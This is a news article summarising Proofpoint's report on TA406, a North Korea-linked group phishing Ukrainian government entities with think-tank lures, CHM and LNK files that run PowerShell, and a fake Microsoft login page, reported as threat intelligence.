North Korean state-sponsored threat actor TA406 has launched a series of phishing attacks against Ukrainian government entities, according to a new report from cybersecurity firm Proofpoint. The campaigns, which began in February 2025, aim to harvest credentials and deliver malware, likely to gather intelligence related to the ongoing Russian invasion of Ukraine.
TA406, a group linked to the Democratic People's Republic of Korea (DPRK) and overlapping with threat actors tracked as Opal Sleet and Konni, has historically targeted government institutions in Russia.
Using freemail services, TA406 spoofed think tank members impersonating a fictitious analyst from a fake organization called the Royal Institute of Strategic Studies. The phishing emails leveraged political themes, including references to former Ukrainian military chief Valeriy Zaluzhnyi, to trick targets into downloading malicious files.
Victims were prompted to access a MEGA-hosted RAR archive titled Analytical Report.rar. Once decrypted, it dropped a CHM file containing HTML pages with embedded PowerShell scripts. The scripts initiated reconnaissance of the victim's system upon user interaction. In some cases, TA406 followed up with additional emails urging recipients to download the file if they had not already done so.
The group also employed alternate delivery methods, including HTML email attachments that linked to ZIP files containing both benign PDFs and malicious LNK files. If executed, the files triggered Base64-encoded PowerShell to begin the infection chain.
Before deploying malware, TA406 attempted credential harvesting by sending fraudulent Microsoft security alerts from Proton Mail accounts. The emails directed users to a spoofed login page hosted on a compromised domain, jetmf[.]com. Though the phishing page was unavailable during analysis, the domain had previously been linked to similar activity targeting users of the South Korean service Naver.
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” the researchers said. “North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments. Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts.”
